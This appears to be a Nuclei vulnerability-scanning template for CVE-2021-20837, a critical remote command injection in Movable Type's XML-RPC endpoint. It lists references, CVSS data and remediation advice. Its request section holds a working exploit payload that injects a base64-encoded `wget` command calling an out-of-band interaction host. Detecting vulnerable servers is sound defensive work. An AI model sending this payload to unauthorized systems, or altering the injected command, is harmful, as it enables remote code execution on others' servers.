id: CVE-2021-20837 info: name: MovableType - Remote Command Injection author: dhiyaneshDK,hackergautam severity: critical description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. remediation: | Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability in MovableType. reference: - https://nemesis.sh/posts/movable-type-0day/ - https://github.com/ghost-nemesis/cve-2021-20837-poc - https://twitter.com/cyber_advising/status/1454051725904580608 - https://nvd.nist.gov/vuln/detail/CVE-2021-20837 - http://packetstormsecurity.com/files/164818/Movable-Type-7-r.5002-XMLRPC-API-Remote-Command-Injection.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-20837 cwe-id: CWE-78 epss-score: 0.97046 epss-percentile: 0.99697 cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:premium:*:*:* metadata: max-request: 1 vendor: sixapart product: movable_type tags: packetstorm,cve,cve2021,rce,movable http: - raw: - | POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml mt.handler_to_coderef {{base64("`wget http://{{interactsh-url}}`")}} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word words: - "failed loading package" - type: status status: - 200 # digest: 4a0a00473045022100e00baae66ba128fc6b74def556918d2248260f533568208a98cf8394c368d2d10220769637bec407e146bced3523ac107bebfd691e61f19ae3d15612b6fc96ab9c9c:922c64590222798bb761d5b6d8e72950